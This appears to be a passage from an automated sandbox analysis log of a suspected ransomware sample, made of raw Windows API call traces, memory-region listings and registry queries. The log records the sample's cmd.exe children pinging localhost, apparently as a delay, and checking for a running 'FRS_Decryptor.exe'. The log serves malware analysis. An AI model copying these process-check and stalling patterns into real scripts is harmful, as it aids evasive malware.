_get_osfhandle (_FileHandle=1) returned 0x28 [0083.249] GetFileType (hFile=0x28) returned 0x2 [0083.249] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x70f024 | out: lpMode=0x70f024) returned 0 [0083.249] GetLastError () returned 0x6 [0083.249] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x70ef88, nSize=0x50 | out: lpBuffer="p✨") returned 0x0 [0083.249] _fileno (_File=0x76ea4c28) returned 1 [0083.249] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0083.249] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0083.249] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xa68a90 [0083.249] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0xa68a90, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TTL=128\r\n", lpUsedDefaultChar=0x0) returned 10 [0083.249] _fileno (_File=0x76ea4c28) returned 1 [0083.249] _write (in: _FileHandle=1, _Buf=0xa68a90*, _MaxCharCount=0x9 | out: _Buf=0xa68a90*) returned 9 [0083.249] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0083.249] _fileno (_File=0x76ea4c28) returned 1 [0083.250] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0083.250] LocalFree (hMem=0xa68a90) returned 0x0 [0083.250] LocalFree (hMem=0xa77fa0) returned 0x0 [0083.250] GetNameInfoW (in: pSockaddr=0x945480*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), SockaddrLength=0x10, pNodeBuffer=0x70efe8, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="127.0.0.1", pServiceBuffer=0x0) returned 0 [0083.250] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x274f, dwLanguageId=0x0, lpBuffer=0x70efbc, nSize=0x0, Arguments=0x70efb8 | out: lpBuffer="羠§p᧰\x94䰨盪❏") returned 0x5c [0083.250] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0083.250] _fileno (_File=0x76ea4c28) returned 1 [0083.250] _get_osfhandle (_FileHandle=1) returned 0x28 [0083.250] GetFileType (hFile=0x28) returned 0x2 [0083.250] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x70ef80 | out: lpMode=0x70ef80) returned 0 [0083.250] GetLastError () returned 0x6 [0083.250] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x70eee4, nSize=0x50 | out: lpBuffer="❏") returned 0x0 [0083.250] _fileno (_File=0x76ea4c28) returned 1 [0083.250] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0083.250] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nPing statistics for 127.0.0.1:\r\n Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 93 [0083.250] LocalAlloc (uFlags=0x40, uBytes=0x5d) returned 0xa78068 [0083.250] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nPing statistics for 127.0.0.1:\r\n Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),\r\n", cchWideChar=-1, lpMultiByteStr=0xa78068, cbMultiByte=93, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nPing statistics for 127.0.0.1:\r\n Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),\r\n", lpUsedDefaultChar=0x0) returned 93 [0083.250] _fileno (_File=0x76ea4c28) returned 1 [0083.250] _write (in: _FileHandle=1, _Buf=0xa78068*, _MaxCharCount=0x5c | out: _Buf=0xa78068*) returned 92 [0083.250] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0083.250] _fileno (_File=0x76ea4c28) returned 1 [0083.250] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0083.250] LocalFree (hMem=0xa78068) returned 0x0 [0083.250] LocalFree (hMem=0xa77fa0) returned 0x0 [0083.250] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2753, dwLanguageId=0x0, lpBuffer=0x70efc8, nSize=0x0, Arguments=0x70efc4 | out: lpBuffer="羠§pᨧ\x94䰨盪❓") returned 0x61 [0083.250] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0083.250] _fileno (_File=0x76ea4c28) returned 1 [0083.250] _get_osfhandle (_FileHandle=1) returned 0x28 [0083.250] GetFileType (hFile=0x28) returned 0x2 [0083.250] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x70ef8c | out: lpMode=0x70ef8c) returned 0 [0083.250] GetLastError () returned 0x6 [0083.250] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x70eef0, nSize=0x50 | out: lpBuffer="p❓") returned 0x0 [0083.250] _fileno (_File=0x76ea4c28) returned 1 [0083.250] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0083.250] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 98 [0083.250] LocalAlloc (uFlags=0x40, uBytes=0x62) returned 0xa78070 [0083.250] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n", cchWideChar=-1, lpMultiByteStr=0xa78070, cbMultiByte=98, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n", lpUsedDefaultChar=0x0) returned 98 [0083.250] _fileno (_File=0x76ea4c28) returned 1 [0083.250] _write (in: _FileHandle=1, _Buf=0xa78070*, _MaxCharCount=0x61 | out: _Buf=0xa78070*) returned 97 [0083.250] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0083.250] _fileno (_File=0x76ea4c28) returned 1 [0083.251] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0083.251] LocalFree (hMem=0xa78070) returned 0x0 [0083.251] LocalFree (hMem=0xa77fa0) returned 0x0 [0083.251] IcmpCloseHandle (IcmpHandle=0xa66bf0) returned 1 [0083.251] LocalFree (hMem=0xa6c3e0) returned 0x0 [0083.251] LocalFree (hMem=0xa75270) returned 0x0 [0083.251] WSACleanup () returned 0 [0083.251] exit (_Code=0) Thread: id = 206 os_tid = 0xbdc Thread: id = 207 os_tid = 0xbd8 Process: id = "66" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x432e000" os_pid = "0xbe4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xa5c" cmd_line = "C:\\Windows\\system32\\cmd.exe /c tasklist|find /i \"FRS_Decryptor.exe\"" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3550 start_va = 0x5a0000 end_va = 0x5bffff entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 3551 start_va = 0x5c0000 end_va = 0x5c1fff entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 3552 start_va = 0x5d0000 end_va = 0x5defff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005d0000" filename = "" Region: id = 3553 start_va = 0x5e0000 end_va = 0x61ffff entry_point = 0x0 region_type = private name = "private_0x00000000005e0000" filename = "" Region: id = 3554 start_va = 0x620000 end_va = 0x71ffff entry_point = 0x0 region_type = private name = "private_0x0000000000620000" filename = "" Region: id = 3555 start_va = 0x720000 end_va = 0x723fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000720000" filename = "" Region: id = 3556 start_va = 0x730000 end_va = 0x730fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000730000" filename = "" Region: id = 3557 start_va = 0x740000 end_va = 0x741fff entry_point = 0x0 region_type = private name = "private_0x0000000000740000" filename = "" Region: id = 3558 start_va = 0x1290000 end_va = 0x12defff entry_point = 0x1290000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 3559 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 3560 start_va = 0x7f270000 end_va = 0x7f292fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f270000" filename = "" Region: id = 3561 start_va = 0x7f298000 end_va = 0x7f298fff entry_point = 0x0 region_type = private name = "private_0x000000007f298000" filename = "" Region: id = 3562 start_va = 0x7f29c000 end_va = 0x7f29efff entry_point = 0x0 region_type = private name = "private_0x000000007f29c000" filename = "" Region: id = 3563 start_va = 0x7f29f000 end_va = 0x7f29ffff entry_point = 0x0 region_type = private name = "private_0x000000007f29f000" filename = "" Region: id = 3564 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3565 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 3566 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3567 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 3568 start_va = 0x8e0000 end_va = 0x8effff entry_point = 0x0 region_type = private name = "private_0x00000000008e0000" filename = "" Region: id = 3569 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 3570 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 3571 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 3572 start_va = 0x5a0000 end_va = 0x5affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 3573 start_va = 0x750000 end_va = 0x7cdfff entry_point = 0x750000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3574 start_va = 0xa30000 end_va = 0xb2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a30000" filename = "" Region: id = 3575 start_va = 0xca0000 end_va = 0xcaffff entry_point = 0x0 region_type = private name = "private_0x0000000000ca0000" filename = "" Region: id = 3576 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3577 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 3578 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 3579 start_va = 0x7f170000 end_va = 0x7f26ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f170000" filename = "" Region: id = 3580 start_va = 0x5b0000 end_va = 0x5b3fff entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 3581 start_va = 0xcb0000 end_va = 0xf84fff entry_point = 0xcb0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 3600 start_va = 0x5c0000 end_va = 0x5c3fff entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Thread: id = 208 os_tid = 0xbe0 [0083.278] GetModuleHandleA (lpModuleName=0x0) returned 0x1290000 [0083.278] __set_app_type (_Type=0x1) [0083.278] __p__fmode () returned 0x76ea1768 [0083.278] __p__commode () returned 0x76ea176c [0083.278] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x12a89b1) returned 0x0 [0083.278] __getmainargs (in: _Argc=0x12b51d8, _Argv=0x12b51dc, _Env=0x12b51e0, _DoWildCard=0, _StartInfo=0x12b507c | out: _Argc=0x12b51d8, _Argv=0x12b51dc, _Env=0x12b51e0) returned 0 [0083.278] GetCurrentThreadId () returned 0xbe0 [0083.278] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xbe0) returned 0x34 [0083.279] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74f70000 [0083.279] GetProcAddress (hModule=0x74f70000, lpProcName="SetThreadUILanguage") returned 0x74fb3daf [0083.279] SetThreadUILanguage (LangId=0x0) returned 0x409 [0083.280] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0083.280] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x71f8a8 | out: phkResult=0x71f8a8*=0x0) returned 0x2 [0083.280] VirtualQuery (in: lpAddress=0x71f8b7, lpBuffer=0x71f850, dwLength=0x1c | out: lpBuffer=0x71f850*(BaseAddress=0x71f000, AllocationBase=0x620000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0083.280] VirtualQuery (in: lpAddress=0x620000, lpBuffer=0x71f850, dwLength=0x1c | out: lpBuffer=0x71f850*(BaseAddress=0x620000, AllocationBase=0x620000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0083.280] VirtualQuery (in: lpAddress=0x621000, lpBuffer=0x71f850, dwLength=0x1c | out: lpBuffer=0x71f850*(BaseAddress=0x621000, AllocationBase=0x620000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0083.280] VirtualQuery (in: lpAddress=0x623000, lpBuffer=0x71f850, dwLength=0x1c | out: lpBuffer=0x71f850*(BaseAddress=0x623000, AllocationBase=0x620000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0083.280] VirtualQuery (in: lpAddress=0x720000, lpBuffer=0x71f850, dwLength=0x1c | out: lpBuffer=0x71f850*(BaseAddress=0x720000, AllocationBase=0x720000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0083.281] GetConsoleOutputCP () returned 0x1b5 [0083.281] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0083.281] SetConsoleCtrlHandler (HandlerRoutine=0x12b1877, Add=1) returned 1 [0083.281] _get_osfhandle (_FileHandle=1) returned 0x158 [0083.281] SetConsoleMode (hConsoleHandle=0x158, dwMode=0x0) returned 0 [0083.281] _get_osfhandle (_FileHandle=1) returned 0x158 [0083.281] GetConsoleMode (in: hConsoleHandle=0x158, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 0 [0083.281] _get_osfhandle (_FileHandle=0) returned 0x24 [0083.281] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0083.281] GetEnvironmentStringsW () returned 0xa340c0* [0083.281] FreeEnvironmentStringsA (penv="=") returned 1 [0083.281] GetEnvironmentStringsW () returned 0xa340c0* [0083.281] FreeEnvironmentStringsA (penv="=") returned 1 [0083.281] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x71e7f8 | out: phkResult=0x71e7f8*=0x44) returned 0x0 [0083.282] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x71e800, lpData=0x71e804, lpcbData=0x71e7fc*=0x1000 | out: lpType=0x71e800*=0x0, lpData=0x71e804*=0x5c, lpcbData=0x71e7fc*=0x1000) returned 0x2 [0083.282] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x71e800, lpData=0x71e804, lpcbData=0x71e7fc*=0x1000 | out: lpType=0x71e800*=0x4, lpData=0x71e804*=0x1, lpcbData=0x71e7fc*=0x4) returned 0x0 [0083.282] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x71e800, lpData=0x71e804, lpcbData=0x71e7fc*=0x1000 | out: lpType=0x71e800*=0x0, lpData=0x71e804*=0x1, lpcbData=0x71e7fc*=0x1000) returned 0x2 [0083.282] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x71e800, lpData=0x71e804, lpcbData=0x71e7fc*=0x1000 | out: lpType=0x71e800*=0x4, lpData=0x71e804*=0x0, lpcbData=0x71e7fc*=0x4) returned 0x0 [0083.282] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x71e800, lpData=0x71e804, lpcbData=0x71e7fc*=0x1000 | out: lpType=0x71e800*=0x4, lpData=0x71e804*=0x40, lpcbData=0x71e7fc*=0x4) returned 0x0 [0083.282] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x71e800, lpData=0x71e804, lpcbData=0x71e7fc*=0x1000 | out: lpType=0x71e800*=0x4, lpData=0x71e804*=0x40, lpcbData=0x71e7fc*=0x4) returned 0x0 [0083.282] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x71e800, lpData=0x71e804, lpcbData=0x71e7fc*=0x1000 | out: lpType=0x71e800*=0x0, lpData=0x71e804*=0x40, lpcbData=0x71e7fc*=0x1000) returned 0x2 [0083.282] RegCloseKey (hKey=0x44) returned 0x0 [0083.282] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x71e7f8 | out: phkResult=0x71e7f8*=0x44) returned 0x0 [0083.282] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x71e800, lpData=0x71e804, lpcbData=0x71e7fc*=0x1000 | out: lpType=0x71e800*=0x0, lpData=0x71e804*=0x40, lpcbData=0x71e7fc*=0x1000) returned 0x2 [0083.282] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x71e800, lpData=0x71e804, lpcbData=0x71e7fc*=0x1000 | out: lpType=0x71e800*=0x4, lpData=0x71e804*=0x1, lpcbData=0x71e7fc*=0x4) returned 0x0 [0083.282] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x71e800, lpData=0x71e804, lpcbData=0x71e7fc*=0x1000 | out: lpType=0x71e800*=0x0, lpData=0x71e804*=0x1, lpcbData=0x71e7fc*=0x1000) returned 0x2 [0083.282] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x71e800, lpData=0x71e804, lpcbData=0x71e7fc*=0x1000 | out: lpType=0x71e800*=0x4, lpData=0x71e804*=0x0, lpcbData=0x71e7fc*=0x4) returned 0x0 [0083.282] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x71e800, lpData=0x71e804, lpcbData=0x71e7fc*=0x1000 | out: lpType=0x71e800*=0x4, lpData=0x71e804*=0x9, lpcbData=0x71e7fc*=0x4) returned 0x0 [0083.282] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x71e800, lpData=0x71e804, lpcbData=0x71e7fc*=0x1000 | out: lpType=0x71e800*=0x4, lpData=0x71e804*=0x9, lpcbData=0x71e7fc*=0x4) returned 0x0 [0083.282] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x71e800, lpData=0x71e804, lpcbData=0x71e7fc*=0x1000 | out: lpType=0x71e800*=0x0, lpData=0x71e804*=0x9, lpcbData=0x71e7fc*=0x1000) returned 0x2 [0083.282] RegCloseKey (hKey=0x44) returned 0x0 [0083.282] time (in: timer=0x0 | out: timer=0x0) returned 0x5aa5007e [0083.282] srand (_Seed=0x5aa5007e) [0083.282] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c tasklist|find /i \"FRS_Decryptor.exe\"" [0083.282] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c tasklist|find /i \"FRS_Decryptor.exe\"" [0083.282] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12b5a20 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0083.282] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xa340c8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0083.282] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0083.283] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0083.283] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0083.283] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0083.283] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0083.283] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0083.283] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0083.283] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0083.283] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0083.283] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0083.283] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0083.283] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0083.283] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0083.283] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x71f5d8 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0083.283] GetFullPathNameW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop", nBufferLength=0x104, lpBuffer=0x71f5d8, lpFilePart=0x71f5d4 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0x71f5d4*="Desktop") returned 0x1c [0083.283] GetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 0x11 [0083.283] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x71f350 | out: lpFindFileData=0x71f350) returned 0xa342d8 [0083.283] FindClose (in: hFindFile=0xa342d8 | out: hFindFile=0xa342d8) returned 1 [0083.283] FindFirstFileW (in: lpFileName="C:\\Users\\5JgHKoaOfdp", lpFindFileData=0x71f350 | out: lpFindFileData=0x71f350) returned 0xa342d8 [0083.283] FindClose (in: hFindFile=0xa342d8 | out: hFindFile=0xa342d8) returned 1 [0083.283] _wcsnicmp (_String1="5JGHKO~1", _String2="5JgHKoaOfdp", _MaxCount=0xb) returned 29 [0083.283] FindFirstFileW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFindFileData=0x71f350 | out: lpFindFileData=0x71f350) returned 0xa342d8 [0083.283] FindClose (in: hFindFile=0xa342d8 | out: hFindFile=0xa342d8) returned 1 [0083.284] GetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 0x11 [0083.284] SetCurrentDirectoryW (lpPathName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 1 [0083.284] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 1 [0083.284] GetEnvironmentStringsW () returned 0xa36190* [0083.284] FreeEnvironmentStringsA (penv="=") returned 1 [0083.284] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12b5a20 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0083.284] GetConsoleOutputCP () returned 0x1b5 [0083.284] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0083.284] GetUserDefaultLCID () returned 0x409 [0083.285] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x12b5560, cchData=8 | out: lpLCData=":") returned 2 [0083.285] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x71f704, cchData=128 | out: lpLCData="0") returned 2 [0083.285] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x71f704, cchData=128 | out: lpLCData="0") returned 2 [0083.285] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x71f704, cchData=128 | out: lpLCData="1") returned 2 [0083.285] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x12b5570, cchData=8 | out: lpLCData="/") returned 2 [0083.285] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x12b5660, cchData=32 | out: lpLCData="Mon") returned 4 [0083.285] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x12b56a0, cchData=32 | out: lpLCData="Tue") returned 4 [0083.285] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x12b56e0, cchData=32 | out: lpLCData="Wed") returned 4 [0083.285] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x12b5720, cchData=32 | out: lpLCData="Thu") returned 4 [0083.285] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x12b5760, cchData=32 | out: lpLCData="Fri") returned 4 [0083.285] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x12b57a0, cchData=32 | out: lpLCData="Sat") returned 4 [0083.285] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x12b57e0, cchData=32 | out: lpLCData="Sun") returned 4 [0083.285] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x12b5580, cchData=8 | out: lpLCData=".") returned 2 [0083.285] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x12b5590, cchData=8 | out: lpLCData=",") returned 2 [0083.285] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0083.286] GetConsoleTitleW (in: lpConsoleTitle=0xa34e28, nSize=0x104 | out: 